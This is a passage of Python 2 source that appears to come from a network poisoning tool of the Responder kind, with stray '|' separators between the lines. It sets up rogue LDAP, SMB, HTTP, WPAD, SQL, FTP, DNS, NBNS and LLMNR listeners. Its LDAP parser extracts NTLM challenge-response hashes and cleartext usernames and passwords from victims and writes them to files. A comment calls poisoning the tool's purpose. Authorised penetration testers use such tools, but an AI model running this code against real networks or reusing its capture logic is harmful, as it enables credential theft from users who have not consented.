logging.warning('[LDAP] NTLMv1 complete hash is :%s'%(writehash))
|
|
if LMhashLen <2 :
|
|
Message = '[+]LDAP Anonymous NTLM authentication, ignoring..'
|
|
print Message
|
|
logging.warning(Message)
|
|
|
|
def ParseNTLM(data,client):
|
|
Search1 = re.search('(NTLMSSP\x00\x01\x00\x00\x00)', data)
|
|
Search2 = re.search('(NTLMSSP\x00\x03\x00\x00\x00)', data)
|
|
if Search1:
|
|
NTLMChall = LDAPNTLMChallenge(MessageIDASNStr=data[8:9],NTLMSSPNtServerChallenge=Challenge)
|
|
NTLMChall.calculate()
|
|
return str(NTLMChall)
|
|
if Search2:
|
|
ParseLDAPHash(data,client)
|
|
|
|
def ParseLDAPPacket(data,client):
|
|
if data[1:2] == '\x84':
|
|
PacketLen = struct.unpack('>i',data[2:6])[0]
|
|
MessageSequence = struct.unpack('<b',data[8:9])[0]
|
|
Operation = data[9:10]
|
|
sasl = data[20:21]
|
|
OperationHeadLen = struct.unpack('>i',data[11:15])[0]
|
|
LDAPVersion = struct.unpack('<b',data[17:18])[0]
|
|
if Operation == "\x60":
|
|
UserDomainLen = struct.unpack('<b',data[19:20])[0]
|
|
UserDomain = data[20:20+UserDomainLen]
|
|
AuthHeaderType = data[20+UserDomainLen:20+UserDomainLen+1]
|
|
if AuthHeaderType == "\x80":
|
|
PassLen = struct.unpack('<b',data[20+UserDomainLen+1:20+UserDomainLen+2])[0]
|
|
Password = data[20+UserDomainLen+2:20+UserDomainLen+2+PassLen]
|
|
print '[LDAP]Clear Text User & Password is:', UserDomain+":"+Password
|
|
outfile = "LDAP-Clear-Text-Password-"+client+".txt"
|
|
WriteData(outfile,'[LDAP]User: %s Password: %s'%(UserDomain,Password),'[LDAP]User: %s Password: %s'%(UserDomain,Password))
|
|
logging.warning('[LDAP]User: %s Password: %s'%(UserDomain,Password))
|
|
if sasl == "\xA3":
|
|
buff = ParseNTLM(data,client)
|
|
return buff
|
|
elif Operation == "\x63":
|
|
buff = ParseSearch(data)
|
|
return buff
|
|
else:
|
|
print '[LDAP]Operation not supported'
|
|
|
|
#LDAP Server Class
|
|
class LDAP(SocketServer.BaseRequestHandler):
|
|
def server_bind(self):
|
|
self.socket.setsockopt(SOL_SOCKET, SO_REUSEADDR,SO_REUSEPORT, 1)
|
|
self.socket.bind(self.server_address)
|
|
self.socket.setblocking(0)
|
|
self.socket.setdefaulttimeout(0.5)
|
|
|
|
def handle(self):
|
|
try:
|
|
while True:
|
|
self.request.settimeout(0.5)
|
|
data = self.request.recv(8092)
|
|
buffer0 = ParseLDAPPacket(data,self.client_address[0])
|
|
if buffer0:
|
|
self.request.send(buffer0)
|
|
except Exception:
|
|
pass #No need to print timeout errors.
|
|
|
|
##################################################################################
|
|
#Loading the servers
|
|
##################################################################################
|
|
|
|
#Function name self-explanatory
|
|
def Is_HTTP_On(on_off):
|
|
if on_off == "ON":
|
|
return thread.start_new(serve_thread_tcp,(BIND_TO_IP, 80,HTTP))
|
|
if on_off == "OFF":
|
|
return False
|
|
|
|
#Function name self-explanatory
|
|
def Is_HTTPS_On(SSL_On_Off):
|
|
if SSL_On_Off == "ON":
|
|
return thread.start_new(serve_thread_SSL,(BIND_TO_IP, 443,DoSSL))
|
|
if SSL_On_Off == "OFF":
|
|
return False
|
|
|
|
#Function name self-explanatory
|
|
def Is_WPAD_On(on_off):
|
|
if on_off == "ON":
|
|
return thread.start_new(serve_thread_tcp,(BIND_TO_IP, 3141,HTTPProxy))
|
|
if on_off == "OFF":
|
|
return False
|
|
|
|
#Function name self-explanatory
|
|
def Is_SMB_On(SMB_On_Off):
|
|
if SMB_On_Off == "ON":
|
|
if LM_On_Off == "ON":
|
|
return thread.start_new(serve_thread_tcp, (BIND_TO_IP, 445,SMB1LM)),thread.start_new(serve_thread_tcp,(BIND_TO_IP, 139,SMB1LM))
|
|
else:
|
|
return thread.start_new(serve_thread_tcp, (BIND_TO_IP, 445,SMB1)),thread.start_new(serve_thread_tcp,(BIND_TO_IP, 139,SMB1))
|
|
if SMB_On_Off == "OFF":
|
|
return False
|
|
|
|
#Function name self-explanatory
|
|
def Is_SQL_On(SQL_On_Off):
|
|
if SQL_On_Off == "ON":
|
|
return thread.start_new(serve_thread_tcp,(BIND_TO_IP, 1433,MSSQL))
|
|
if SQL_On_Off == "OFF":
|
|
return False
|
|
|
|
#Function name self-explanatory
|
|
def Is_FTP_On(FTP_On_Off):
|
|
if FTP_On_Off == "ON":
|
|
return thread.start_new(serve_thread_tcp,(BIND_TO_IP, 21,FTP))
|
|
if FTP_On_Off == "OFF":
|
|
return False
|
|
|
|
#Function name self-explanatory
|
|
def Is_LDAP_On(LDAP_On_Off):
|
|
if LDAP_On_Off == "ON":
|
|
return thread.start_new(serve_thread_tcp,(BIND_TO_IP, 389,LDAP))
|
|
if LDAP_On_Off == "OFF":
|
|
return False
|
|
|
|
#Function name self-explanatory
|
|
def Is_DNS_On(DNS_On_Off):
|
|
if DNS_On_Off == "ON":
|
|
return thread.start_new(serve_thread_udp,(BIND_TO_IP, 53,DNS)),thread.start_new(serve_thread_tcp,(BIND_TO_IP, 53,DNSTCP))
|
|
if DNS_On_Off == "OFF":
|
|
return False
|
|
|
|
SocketServer.UDPServer.allow_reuse_address = 1
|
|
SocketServer.TCPServer.allow_reuse_address = 1
|
|
|
|
|
|
def serve_thread_udp(host, port, handler):
|
|
try:
|
|
server = SocketServer.UDPServer((host, port), handler)
|
|
server.serve_forever()
|
|
except:
|
|
print "Error starting UDP server on port " + str(port) + ". Check that you have the necessary permissions (i.e. root) and no other servers are running."
|
|
|
|
def serve_thread_tcp(host, port, handler):
|
|
try:
|
|
server = SocketServer.TCPServer((host, port), handler)
|
|
server.serve_forever()
|
|
except:
|
|
print "Error starting TCP server on port " + str(port) + ". Check that you have the necessary permissions (i.e. root) and no other servers are running."
|
|
raise
|
|
|
|
def serve_thread_SSL(host, port, handler):
|
|
try:
|
|
server = SSlSock((host, port), handler)
|
|
server.serve_forever()
|
|
except:
|
|
print "Error starting TCP server on port " + str(port) + ". Check that you have the necessary permissions (i.e. root) and no other servers are running."
|
|
|
|
def main():
|
|
try:
|
|
Is_FTP_On(FTP_On_Off)
|
|
Is_HTTP_On(On_Off)
|
|
Is_HTTPS_On(SSL_On_Off)
|
|
Is_WPAD_On(WPAD_On_Off)
|
|
Is_SMB_On(SMB_On_Off)
|
|
Is_SQL_On(SQL_On_Off)
|
|
Is_LDAP_On(LDAP_On_Off)
|
|
Is_DNS_On(DNS_On_Off)
|
|
#Browser listener loaded by default
|
|
thread.start_new(serve_thread_udp,(BIND_TO_IP, 138,Browser))
|
|
## Poisoner loaded by default, it's the purpose of this tool...
|
|
thread.start_new(serve_thread_udp,(BIND_TO_IP, 137,NB))
|
|
thread.start_new(RunLLMNR())
|
|
except KeyboardInterrupt:
|
|
exit()
|
|
|
|
if __name__ == '__main__':
|
|
try:
|
|
main()
|
|
except:
|
|
raise
|
|
raw_input()
|
|
|
|
|